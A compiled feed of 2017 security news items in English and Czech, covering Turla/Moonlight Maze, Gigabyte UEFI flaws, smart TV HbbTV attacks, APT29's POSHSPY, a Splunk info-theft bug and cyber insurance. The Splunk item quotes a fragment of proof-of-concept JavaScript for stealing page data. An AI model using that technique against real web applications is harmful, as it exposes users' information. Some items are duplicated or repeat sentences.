“The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes.” reads the analysis published by Kaspersky. “In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s.”

Guerrero-Saade explained that of the 45 Moonlight Maze binaries that were detected by experts at Kaspersky, nine of them were examples of the LOKI2 backdoor.

This discovery is amazing because it demonstrates a 20-year-old hacking tool is still effective against high-value targets.

“This speaks to the state of Linux security and the lack of awareness—and even hubris—that goes into some Linux system administration, an ill-advised approach for government and corporate settings,” Guerrero-Saade said. “These guys (Moonlight Maze) didn’t have to play the cat-and-mouse game with antivirus companies or rewrite their toolkit 30 times to get it through VirusTotal and still hope it works. It’s terrifying to see that the evolved Penquin Turla samples are based on 20 year old code and still linked to libraries built in 1999-2004 and they still work on modern machines. You’d never see that on Windows.”

Summarizing the possible link between the Moonlight Maze’s early UNIX and Solaris toolkits and modern Turla Windows attacks is the LOKI2 backdoor used in the Penguin Turla attacks.

The researchers conducted an intriguing a lucky investigation, they have found the original artifacts thanks a system administrator in the U.K. named David Hedges who in cooperation with the London Metropolitan Police and the FBI logged every keystroke happening on a server targeted by the Moonlight Maze. The researchers were able to find Hedges because of a redaction error in an FBI FOIA release.

Hedges confirmed that the server was still running and he provided access to logs that include evidence of the Moonlight Maze operation, along with the a toolkit with 43 binaries used in their attacks.

The investigation revealed further details, the researchers focused on a little-known operation codenamed ‘Storm Cloud’. The toolkit used in the attacks was an evolution of the toolkit leveraged by the same Moonlight Maze threat actors.

The first attacks became public in 1999, Storm Cloud was also made public four years later, and also in this case, the code was based on the LOKI2 backdoor.

“We’re really trying to push the crowdsourcing element to this,” Guerrero-Saade said. “Thomas’ first talk helped us find David and more about Moonlight Maze. We need help. We need another David Hedges, someone with access to the Storm Cloud artifacts to really solidify this link.”


UEFI Vulnerabilities allow to fully compromise Gigabyte Mini PCs
4.4.2017 securityaffairs Vulnerebility

Experts at Cylance disclosed two UEFI flaws that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.
Experts at security firm Cylance have disclosed two UEFI vulnerabilities that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.

The experts tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that lack of some protection feature that could allow an attacker to exploit the flaws to deliver a ransomware payload that prevents the system from booting.

“These new mitigations, based on virtualization technologies in Windows 10, are vulnerable to UEFI-based attacks from System Management Mode (SMM). Because SMM allows direct access to physical memory, it’s possible to bypass the virtualization layer of isolation (Intel VT-x) . This kind of attack is already discussed in detail in ‘Attacking Hypervisors via Firmware and Hardware’. ” reads the analysis published by Cylance.

One of the issues, tracked as CVE-2017-3197, is related to the SMI handler and it could be exploited to execute code in System Management Mode (SMM). The researchers discovered that the American Megatrends (AMI) firmware running on the affected devices has disabled write-protection mechanisms. The security features are normally enabled by Gigabyte seems to have disabled it.

The flaw is very dangerous, an attacker can trigger it by tricking victims into visiting a specifically crafted website or by opening a weaponized document. Once triggered the flaw, the attacker can elevate privileges to achieve kernel-mode code execution. The attacker can exploit the SMI vulnerability to execute code in SMM and make direct changes to the flash memory.

Below the attack described by the experts:

1. User-mode execution (ring 3)
2. Kernel mode execution (ring 0)
3. SMM execution (ring -2)
4. SPI Flash Write

“The attacker gains user-mode execution through an application vulnerability such as a browser exploit or a malicious Word document with an embedded script. From there, the attacker elevates his privileges by exploiting the kernel or a kernel module such as Capcom.sys to execute code in ring 0. A vulnerable SMI handler allows the attacker to execute code in SMM mode (ring -2) where he finally can bypass any write protection mechanisms and install a backdoor into the system’s firmware.”

gigabyte

The second vulnerability tracked as CVE-2017-3198, is caused by the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure the authenticity and integrity of a firmware update. This means that an attacker that exploited the issue is able to provide malicious firmware onto the device.

“The GIGABYTE UEFI firmware does not cryptographically validate images prior to updating the system firmware. Additionally, the firmware updates are served over HTTP without checksums for verifying authenticity.” reads a blog post published by Cylance.

An attacker can use the provided AMI Firmware Update (AFU) utility to write arbitrary code to the firmware.”

“As mentioned in our previous post, successful infection at such a low level has the potential to be disastrous. UEFI rootkits and ransomware, as we demonstrated at both RSA Conference and BlackHat Asia, could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.” continues a blog post published by Cylance.

The security flaws were discovered just before Christmas and the experts reported it to Gigabyte in mid-January. The company has already developed a firmware update, version vF7, that is currently in testing phase and will be soon released. However, the update will only be available for GB-BSi-7H-6500 as the GB-BXi7-5775 model has reached

Unfortunately, the update will only be available for GB-BSi-7H-6500 because the GB-BXi7-5775 model has reached end of life.


Nedávná hackerská výzva Googlu nikoho nezajímala

3.4.2017 SecurityWorld Zabezpečení
Je Android na dálku neprolomitelný, anebo zkrátka dvou set tisícová odměna nebyla dostatečnou motivací? Google uzavírá netradiční hackerskou výzvu. Před půl rokem nabídl 200 tisíc amerických dolarů (cca 5 milionů korun) tomu, kdo se dokáže na dálku nabourat do androidového zařízení se znalostí pouze telefonního čísla a emailové adresy uživatele. O odměnu se nikdo nepřihlásil.
Ovšem ačkoliv se to může zdát jako dobrá zpráva dosvědčující sílu zabezpečení operačního systému, důvod toho, že výzva nenašla svého pokořitele, bude pravděpodobně jiný. Například, potenciální účastníci namítali, že na daný úkol je odměna 200 tisíc dolarů příliš nízká. Pokud by prý totiž systém někdo tímto způsobem dokázal prolomit, tak by svůj úspěch mohl prodat za daleko vyšší sumu. Což ostatně po skončení soutěže připustil i samotný Google.

Dalším důvodem nízkého zájmu může být podle společnosti složitost daného úkolu a existence obdobných výzev, které jsou však přece jen o něco snazší, respektive nemají tak přísná pravidla. Totiž, dostat se k jádru Androidu a plně se zmocnit daného zařízení, vyžaduje objevení ne jedné, ale mnohem více chyb v systému a schopnost jejich vzájemného provázání. Jedna z chyb by přitom útočníkovi musela umožňovat vzdáleně spustit škodný kód, například v rámci některé z aplikací a ještě k tomu se vyhnout sandboxu aplikace.

Podmínkou výzvy totiž bylo i to, aby útočník dokázal zařízení ovládnout bez jakékoliv interakce jeho majitele – tedy bez toho, aby uživatel například musel kliknout na škodný odkaz, navštívit webovou stránku či otevřít emailovou přílohu. Tato podmínka tedy výrazně omezila množství „vstupních bodů“, jakými se útočníci mohli do zařízení dostat. První díra v řetězci by se totiž musela nacházet ve vestavěných funkcích pro SMS nebo MMS anebo také v tzv. baseband firmwaru sloužícímu k ovládání modemu a zneužitelnému skrz mobilní síť.

Způsob prolomení bezpečnosti Androidu, který splňoval daná kritéria, byl objeven v roce 2015. Na soubor chyb využívající multimediální knihovnu Stagefright tehdy upozornili vývojáři společnosti Zimperium. Zjistili, že k ovládnutí systému prakticky stačí doručení škodlivé MMS. Kauza před dvěma roky odstartovala masivní záplatování Androidu, jehož součástí bylo i vypnutí funkce automatického přijímání MMS.

„Podobné chyby zneužitelné na dálku bez účasti uživatele jsou vzácné a vyžadují spoustu kreativity a důvtipu,“ komentoval aktuální výzvu Googlu Zuk Avraham, šéf Zimperia. „A rozhodně mají vyšší cenu než dvě stě tisíc dolarů.“

Mimochodem, obdobnou soutěž vyhlásila i společnost Zerodium, nabízející za prolomení Androidu na dálku rovněž 200 tisíc dolarů, s tím rozdílem, že neomezuje interakci uživatele. Zerodium objevené chyby dále přeprodává svým klientům, mezi které patří například i zpravodajské agentury.

Nabízí se tedy otázka, proč, pokud by se někomu takovou chybu skutečně podařilo odhalit, by ji dotyčný prodával Googlu, když i méně složité hacky může na černém trhu zpeněžit stejně či ještě lépe.

„Obecně můžeme říct, že tahle soutěž pro nás byla zkušenost a že to, co jsme se díky ní naučili, využijeme v dalších podobných programech,“ uvedla za Google Natalie Silvanovich s tím, že od počestných vývojářů očekává alespoň připomínky a komentáře.

I přes neúspěch soutěže se ale hodí zmínit, že Google je v podobných projektech průkopníkem a mnoho jiných jich přineslo své ovoce v podobě softwarových vylepšení či rozvoje online služeb. A pravděpodobnost, že komerční výrobci dokážou v podobných situacích konkurovat odměnám nabízeným zločineckými organizacemi či zpravodajskými agenturami, je velice nízká. Nakonec, programy zaměřené na odhalování chyb a hackovací soutěže, jsou určené v prvé řadě těm vývojářům, kteří nepostrádají smysl pro zodpovědnost.


Až 90 % chytrých televizorů lze hacknout. Přes DVB-T!
3.4.2017 Živě.cz BigBrothers

Bezpečnostní expert vytvořil nový koncept sofistikovaného útoku, jehož terčem jsou tzv. chytré televizory. Stačí k tomu falešný DVB-T vysílač a potenciální útočník dokáže získat administrátorská oprávnění nebo možnost spustit libovolný škodlivý kód. Na hrozbu upozornila Ars Technica.

Ohrožena je většina chytrých televizorů

Rafael Scheel prezentoval své odhalení na bezpečnostní konferenci EBU (European Broadcasting Union). Jeho způsob útoku se přitom výrazně odlišuje od podobných pokusů o ovládnutí chytrých televizorů. Lze ho totiž provést ze vzdáleného místa, bez jakékoli interakce s uživatelem a navíc na pozadí.
CIA prý útočila na chytré televizory a nejspíše se vydávala i za Rusy
3.4.2017 Živě.cz  V praxi je tato technika nenápadná a téměř neodhalitelná. Nejhorší na celé situaci je to, že podle vyjádření bezpečnostního experta trpí zranitelností až 90 procent televizorů prodaných v posledních letech. Seznam testovaných či ohrožených modelů však nebyl zveřejněn.

Hlavním předpokladem pro úspěšné provedení útoku je chytrý televizor s připojením na internet a podporující standard HbbTV. Nezáleží přitom, jakým způsobem je přijímán samotný signál, technologii HbbTV lze úspěšně zneužít prostřednictvím standardů DVB-T, DVB-C i přes IPTV.
Novinky u České televize: iVysílání konečně bez Flashe a zpravodajství kompletně v HD
Výzkumník v rámci demonstrace využil miniaturní DVB-T vysílač, který sestrojil z běžně dostupných elektronických součástek. Útočné zařízení ho přitom nestálo více než 150 dolarů (tj. cca 3 800 Kč).

Útoky lze realizovat v masivním měřítku

Falešný terestriální vysílač může mít dosah až na stovky domácností. Kromě toho, někteří poskytovatelé kabelové televize využívají právě DVB-T vysílání pro retransmisi. Tím se potenciální dosah výrazně zvyšuje. V krajním případě by však mohl posloužit například i dron nesoucí DVB-T vysílač.

Na místě je otázka, jak přimět televizor, respektive oběť, aby si naladila vysílání obsahující nebezpečný HbbTV obsah. Odpovědí je jedna ze základních vlastností moderních televizorů – upřednostní vždy silnější zdroj digitálního pozemního vysílání. Divák tak nedokáže zjistit, zda je zařízení připojeno k legitimnímu vysílači nebo ne.

Závěrečnou fází je samotný útok. HbbTV je součástí DVB-T signálu, který televizor zpracovává ihned po zvolení televizní stanice. Nejčastějším příkazem využívaným v HbbTV je inicializace a načtení cílové webové stránky na pozadí.

Právě díky této funkci lze vytvořit nenápadný přístup do televizoru nic netušícího uživatele. Rafael Scheel vytvořil speciální internetové stránky, jejichž součástí byl i škodlivý kód. Ten využil dvojici starších zranitelností v jádru webového prohlížeče integrovaného v chytrých televizorech.

Výsledkem bylo získání administrátorského přístupu a plné kontroly nad infikovaným televizorem. Kyberzločinci by následně mohli do zařízení nainstalovat jakýkoliv další malware, špehovat cílovou osobu s využitím integrované kamery či mikrofonu, krást uložené přihlašovací údaje, provádět DDoS útoky proti webovým stránkám a mnoho jiného.

Nezjistitelný a napořád

Uvedený typ útoku je prakticky nemožné vystopovat. Stačí přibližně jedna minuta falešného vysílání a zařízení se automaticky infikuje. Přítomné nejsou žádné stopy či indicie, že infiltrace proběhla právě prostřednictvím DVB-T vysílání.

Samostatnou kapitolou jsou bezpečnostní chyby. V tomto konkrétním případě byly zneužity zranitelnosti staré více než dva roky. Problémem je, že výrobci televizorů nejsou nuceni pravidelně opravovat svůj firmware a ten zůstává i několik let děravý.

Navíc, škodlivý kód může být vytvořen takovým způsobem, že bude blokovat všechny pokusy o kontrolu a instalaci aktualizací. Bezpečnostní expert na závěr uvedl, že jeho koncept malwaru zůstal v televizoru přítomen i po obnovení na tovární nastavení.


Další várka úniků ze CIA. Wikileaks popisuje, jak se Američané údajně vydávají za Rusy, Číňany a další
3.4.2017 Živě.cz BigBrother

Skupina Wikileaks přitvrdila a na sklonku března vypustila další várku uniklých dokumentů ze zpravodajské agentury CIA. Tentokrát však nejde o vágní dokumentaci nejrůznějších vládních nástrojů pro kybernetickou špionáž, ale konečně něco konkrétního – části zdrojových kódů Marble Framework.
Další várka úniků ze CIA: „Temná hmota“ a „sonický šroubovák“ jsou postrachem jablíčkářů
V tomto případě se nejedná o kybernetickou zbraň, ale spíše technologii stealth, která má zakrýt stopy. Dejme tomu, že kybernetičtí operativci budou potřebovat dostat do počítače cíle nějaký malware, který jim otevře vrátka do systému. Kdyby použili vlastní řešení, mohla by druhá strana forenzní analýzou vyčmuchat, kdo za tím vším stojí.

Klepněte pro větší obrázek
Jedna z technik frameworku Marble, která vloží do vládního malwaru textové řetězce třeba v ruštině. Marble je v tomto ale zjevně povrchní, jak totiž napovídají slovíčka „lorem ipsum,“ věty nejspíše nedávají příliš smysl.

Právě od toho je tu Marble Framework, který z amerického malwaru udělá třeba ruský. Jak? CIA na to může jít různými cestami. Buď jednoduše upraví nějaký ruský malware, který původně sloužil k něčemu úplně jinému, anebo zapojí Marble, který jejich malware šitý na míru upraví tak, aby si třeba analytici z antivirových firem mysleli, že se jedná o virus odkudsi z východní Evropy.

Marble Framework to provede třeba tak, že do dat viru vloží různé textové řetězce v jazyce, který potřebují. Může to být čínské písmo, azbuka, arabština… Záleží na aktuální potřebě.

Ve výsledku tedy může malware vypadat opravdu jako každý jiný, kterých po síti poletují tisíce a snaží se cílový počítač zapojit do botnetu. Že jej ve skutečnosti vyslala do světa CIA a o klasický botnet ji vůbec nejde, se přitom v ideálním případě vůbec nikdo nedozví¨, protože Marble zamete všechny stopy.


New "USB Canary" Keeps Close Watch on USB Ports

3.4.2017 securityweek IT
New "USB Canary" Tool for Linux Monitors USB Ports 24/7

A new open source tool can provide Linux users with the ability to receive an alert any time someone attempts to plug a device into one of their machine’s USB ports.

Dubbed USB Canary, the tool uses pyudev to monitor USB devices and can be set to do so either at all times or only when the computer is locked. More importantly, the tool can be configured to alert users when someone is tampering with their USB ports. It can either send an SMS via the Twilio API, or send a Slack notification via an inbuilt Slack bot.

Released in open source not long ago, the tool aims at overcoming some of the shortcomings of other monitoring tools that inform the user on USB port-related incidents only after login. USB Canary aims at keeping an eye on systems at all times when they are unattended.

According to the researcher, who goes by the online handle errbufferoverfl, although the tool is available only for Linux at the moment, Windows and macOS versions are also planned (but no specific details on them have been revealed so far).

Written in Python, the author explains that the tool was initially created as a personal utility while he was between jobs and that the use of third-party libraries.

Users can configure the tool to detect the type of screensaver running on the computer (it can detect XScreenSaver and gnome-screensaver, but can be used with unsupported screensavers as well), to turn a “paranoid” mode on, and set the notifications to arrive either via Twilio or Slack.

“Paranoid mode is also suitable for people who want to monitor if their servers have had USB's plugged into them, although I haven't tested them on Linode, Amazon Web Services, or Digital Ocean it is suitable for those with physical servers that may need this sort of monitoring,” the researcher notes.

Although this was a personal project in the beginning, others already picked it up and helped improving it through their contributions.

The open source tool is available via GitHub.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component on every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


UEFI Vulnerabilities Found in Gigabyte Mini PCs

3.4.2017 securityweek Vulnerebility

Endpoint security firm Cylance has disclosed the details of two potentially serious UEFI vulnerabilities that can be exploited to install a backdoor on some Gigabyte BRIX mini PCs. The vendor is working on a firmware update that will address the flaws.

Cylance said it had tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that some important protection mechanisms are missing. The company has described an attack scenario where a malicious actor exploits the vulnerabilities to deliver a ransomware payload that prevents the system from booting.

One of the vulnerabilities found by researchers, tracked as CVE-2017-3197, is related to the SMI handler and it allows an attacker to execute code in System Management Mode (SMM). The American Megatrends (AMI) firmware present on affected devices does normally provide write-protection mechanisms designed to prevent unauthorized changes, but these protections have not been enabled by Gigabyte.

Hackers can exploit this flaw for malicious attacks by first gaining access to the targeted system via a browser or document exploit. The attacker can then elevate privileges to achieve kernel mode code execution. Since write-protection mechanisms are not enabled, the attacker can exploit the SMI vulnerability to execute code in SMM and make changes to the flash memory.

The second vulnerability, identified as CVE-2017-3198, is related to the fact that the Gigabyte UEFI does not perform a cryptographic check to ensure that a firmware update is legitimate. Furthermore, firmware updates are served over HTTP.

An attacker who obtains access to the targeted system can install the legitimate UEFI update utility and use it to push a malicious firmware onto the device.

“Successful infection at such a low level has the potential to be disastrous,” Cylance researchers said in a blog post. “UEFI rootkits and ransomware could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.”

The vulnerabilities were discovered on December 20 and they were reported to Gigabyte in mid-January. The vendor says it has prepared a firmware update, version vF7, that is in the final phase of testing. However, the update will only be available for GB-BSi-7H-6500 as the GB-BXi7-5775 model has reached end of life.


Splunk Patches Information Theft and XSS Flaws

3.4.2017 securityweek Vulnerebility
Splunk last week released an update for Splunk Enterprise to address an information theft bug and a persistent Cross Site Scripting (XSS) vulnerability.

Discovered last year by security researcher John Page (who goes by the online handle of hyp3rlinx), the information theft issue is tracked as CVE-2017-5607 and has been assessed a CVSS Base Score of 3.5. The vulnerability can be exploited by a remote attacker to siphon information from Splunk Enterprise when the user visits a malicious webpage.

In an advisory, the security researcher notes that an attacker exploiting this vulnerability could access data such as the currently logged in username and if remote user setting is enabled. With the username in hand, the attacker could either phish or brute force the Splunk Enterprise login.

The attacker can use JavaScript to exploit the issue, as the root cause of it is the global Window JS variable assignment of config?autoload=1 '$C', the security researcher notes in his advisory.

“To steal information we simply can define a function to be called when the '$C' JS property is ‘set’ on webpage, for example.

Object.defineProperty( Object.prototype, "$C", { set:function(val){...

The Object prototype is an Object that every other object inherits from in JavaScript, if we create a setter on the name of our target in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace,” the researcher explains.

Splunk has confirmed that affected Splunk Enterprise versions include 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13.1; 6.1.x before 6.1.13; 6.0.x before 6.0.14; 5.0.x before 5.0.18; and Splunk Light before 6.5.2.

The security researcher discovered the bug in November 2016 and reported it to Splunk the same month. He received acknowledgement of the bug a couple of days later, but the patch was released only last week. The researcher published not only details pertaining to the vulnerability, but also proof-of-concept JavaScript code and a video to demonstrate the flaw.

The second vulnerability addressed in Splunk Enterprise last week was a persistent Cross Site Scripting in Splunk Web, which was found to allow an attacker to inject and store arbitrary script, but only if they are authenticated in Splunk web before exploiting the bug. Assessed with a CVSS Base Score of 6.6, the flaw impacts Splunk Enterprise versions 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13; and Splunk Light before 6.5.2.


Cyber Risk and Cyber Insurance – Insurance challenge to the CIO as corporate Cyber Security Effectiveness manager
3.4.2017 securityaffairs CyberCrime

[By Cesare Burei, Margas on courtesy of @CLUSIT – Rapporto Clusit 2017 – All right reserved]
Until the corporate Risk Managers dealing with Cyber Risk, and there are not many of these, start working at all levels, who shall be entrusted with the management of Cyber Risks and, more specifically, with the transfer of risk to the Insurance Companies? The answer is a joint round table driven by the CIO.

The Clusit Report 2016 provided the basics of the terminology, key features and usefulness of cyber policies in a Focus On dedicated to insurance in support of the so-called Cyber Risk management. The authors implicitly addressed the CFO, the position that usually supervises the insurance issues in a company.

One year after, the daily dealings between businesses, insurance brokers and ICT consultants have highlighted the following elements:

Cyber Risk includes the accident/attack and all its direct and indirect consequences
Awareness of the pervasive nature of Cyber Risk well beyond the walls of EDP, in a digital ecosystem made of interconnections and process, people and now objects (IoT) interdependence has increased
Risk Management, meaning risk analysis and mitigation and insurance transfer, has become increasingly important.
Business interruption, loss of reputation and data loss/unavailability are the most frequent issues for businesses.
This gave rise to a double investigation in the North-East of Italy, which ended in the “Enterprise Cyber Risk Exposure & Insurance” 1 report by Via Virtuosa, in collaboration with Margas for the insurance part, published on line at the end of 2016, hereinafter, the “White Paper”.

The first survey outlines, through the answers given by CIOs and Systems Administrators, the risk exposure of companies, so that CFOs and CEOs can become aware of the central role of the Cyber Security activity, managed in-house or outsourced. The second survey, also carried out with the help of the CIO, who has to assess the risk or the protection levels in place, tries to assess the level of knowledge and sensitivity of the insurance transfer.

The results highlight some aspects that show the key role of the CIO in the transition phase from the management of ICT security to cyber risk management for the whole company; the transfer of the so-called “residual risk” to the insurance company is an ultimate, fundamental component of such management. For this reason, the white paper includes some basic information on the Italian insurance market and, above all, thanks to the 18 questions that three CIOs accepted to ask, it also includes 18 useful answers that allow people to find their direction in the purchase of an insurance policy with increased awareness.

1 *The “Cyber Risk Exposure & Cyber Risk Insurance” white paper is the result of the joint efforts of Luca Moroni and Cesare Burei. It also includes the contributions by CIOs E. Guarnaccia – BPV | M. Cozzi – Hypo Bank |A. Cobelli – ATV| and the answers to their 18 questions on cyber-insurance. The risk exposure survey was carried out in the 2013-2016 three-year period, while the one on Cyber Risk Insurance in summer 2016. The white paper can be downloaded free of charge from: www.viavirtuosa.com/whitepaper and supports the “Generation Z” survey on online security and the prevention of risk for minors https://www.facebook.com/ProgettoGenerazioneZ/

Cyber Risk Insurance. Why?
The certainty that it is not possible to defend oneself completely from Cyber Risks requires such risks to be managed and the relevant tools to be correctly assessed in terms of costs and benefits. In short, it is a matter of balance between the impact of a cyber or cyber-related adverse event, the money spent in the management /insurance process and the maintenance of business margins.

Source: L. Moroni – “Cyber Exposure & Cyber Risk Insurance” White paper presentation at Infosek 2016 – Slovenia

On the occasion of the Security Summit and thanks to the Clusit Report, a lot of figures and percentages were made known, the better to describe the overall cyber un-safety, as they all underscore that there is no 100% safe system.

Source: CHUBB Claim Trends 8/2016

It is possible to be proactive, with effective and appropriate investments on the reduction of corporate risks, in order to be prepared to deal with accidents and the costs/damages that they engender. Insurance policies turn an uncertain, often unsustainable cost/damage into a programmed and sustainable cost/premium. The choice, therefore, must be based on a careful assessment, in the prevention phase, so that the policies shall truly act as a financial and economic parachute, allowing the company to avoid the closure and be still competitive after the incident, providing the appropriate tools for compensate balance sheet losses and recover the brand reputation.

Source: CHUBB Claim Trends 8/2016

Cyber Risk Exposure and Cyber Risk Insurance
Speaking about Cyber Risk Insurance, a policy or set of policies that “cover” the damages and costs generated by a cyber or cyber-related adverse event, it makes no sense if there is no awareness of one’s risk exposure and thus there is no attempt to adopt measures to mitigate such exposure.

The risk exposure survey results

The risk exposure survey carried out by Via Virtuosa in the course of 3 years, synthesised in the White paper, “rather than highlighting an individual company’s positioning and risk exposure, focuses on the statistical trends of the interviewed sample, in this case, companies in the North-Eastern part of Italy, as against a reference Base Line (Red Line). The measuring method used in this case is strictly objective (as was the case for the 2700x) and the same for the whole sample group, even though it was considerably simplified. The method in question is the one adopted by the European Union Agency for Network and Information Security (ENISA).

Those who fall in the yellow section at the top right (yellow) have a significant risk exposure, with a potentially disruptive impact on their business. Those who find themselves in this section are invited (as per the Method) to “outsource their risk.”

This research highlighted the following aspects:

There is a high level of corporate Cyber risk that has a direct impact on business continuity.
The IT department is usually aware of the issue, but is faced with an almost total lack of managerial attention from the corporate board, which translates into a dearth of investment.
There is no objective measure of the Cyber risk on the part of enterprises.
Objective indications of the need to transfer the Cyber risk outside the company emerge.
The results of the CIOs and Cyber Risk Insurance survey
The sample of this second survey contained a prevalence of subjects from the industry and services sectors (40% and 35%, respectively), with turnovers exceeding 20 million Euro (75%) and with over 100 employees (50% between 100-500 and 30% > 500).

This presupposes that aspects such as Reputation, Business Interruption and Sensitive Data management might be critical.

In the survey, IT Managers were asked, first of all, about the best case scenario in terms of board commitment to the creation of a corporate security team, and whether ICT security is considered an integral part of the general security approach or just as a possible source of costs and damages (questions 1,4).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Then, the same subjects were asked to do something that was probably unusual for them: interact with their respective CFOs, in order to answer the question on the presence of some insurance policies that ought to be taken into consideration with regard to the criticalities highlighted by the risk exposure analysis. (question 3)

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

60% of the interviewed CIOs were involved in a wider approach to security. Again, in 60% of cases the CIO had not, to that point, taken an interest in insurance policies (q.2), and even though in 80% of cases no one in the company thought to ask him about the impact of a possible accident (q. 4), he had a clear idea of its origins (q. 4) and was able to identify the sector that might suffer the most from a business interruption (question 8).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

The CIO deals with ICT security: he monitors vulnerabilities (60% of cases) and the Business Continuity and Disaster Recovery plans (50-60% of cases), but deals very rarely with reputation crisis issues (18%), procedure/policy formalisation (28%) or the standardisation of issues (12%).

It is a positive sign that the CIO receives requests for information concerning ICT security management (question 7) first of all from inside the company (+70%), then from external auditors (+28%) and from customers and ICT suppliers in equal measure (23-24%). The latter percentages might increase in future, leading to a supply chain control in terms of virtuous management and also of insurance, and in any case they may constitute a good foundation for a Cyber Risk Management policy.

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

39% of them state that they know of security accidents occurred in the last 5 years. An analysis of the causes shows that such accidents are substantially attributable, in equal proportions, to (external/internal) attacks, with a prevalence of Ransomware (as more than 50% declared), to (internal/external) human error and to failures (question 9).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

What question 8 revealed concerning the CIO’s opinion of the worst impact of a stop of the ICT activities on the Administration/Accounting (+ 80%), logistics and deliveries (73%) and sales (60%) departments, makes it possible for the authors to go back to the value and meaning of insurance outsourcing: failure to pay the suppliers, failure to make orders or failed deliveries can assuredly cause problems for the bottom line in the short-, medium- or long-term.

“Virtuous” companies, that is to say, those that have adopted Cyber Risk Management policies, can therefore deal with the insurance companies with a full awareness of the residual risk that needs to be transferred, especially with regard to business interruption, intentional/accidental cyber issues and issues of general or professional third-party liability, and correctly assess also the reputation risk, if necessary.

With the CIO at the Cyber Risk Management round table
The results of the survey show that the CIO can act as a “cultural mediator” for the company, with the help of a competent insurance broker.

Below is a brief synthesis of the activities of a hypothetical operational round table on the management of cyber risk:

Cyber Risk Exposure and proactive approach: knowing the extent and nature of the exposure

Identify and quantify the assets and their value
Identify the exposure and its value, that is to say, the operating and financial consequences of an adverse event
Identify and quantify the investment in mitigation activities
Check the insurance coverage of the company and of its suppliers
Now the necessary tools and knowledge to deal with the insurance issues are in place, so it is time to TRANSFER THE RESIDUAL RISK.

Cyber Risk Insurance: transfer the residual risk to an Insurance Company

Identify a skilled insurance partner and analyse the corporate insurance stand.
Check the traditional policies purchased by the company to which the cyber coverage might be added.
Choose and structure a Cyber insurance policy that specifically deals with the risk to be transferred and the relevant costs (business interruption, general and professional third-party liability, violation or improper use of assets, defence of reputation, reaction and analysis countermeasures, etc.)
For further details, please refer to the Focus On feature in the 2016 Clusit Report.

The results of the “dialogue” between the CIO and the Insurance Broker – Answers concerning Cyber Risk Insurance
We asked the CIOs of three important companies in the North-East of Italy to ask any questions they could thing of in order to make the layman understand the opportunities and limitations of the insurance policy. Here is a synthesis of the answers to the most frequently asked questions (18):

It is necessary to analyse the existing policies and check whether they cover also the ICT issues identified during the analysis;

To date, there is no requirement for a shared standard measure of exposure. Any best practices, certifications for risk mitigation can promote the successful transfer of risk to the insurance company at better coverage conditions;

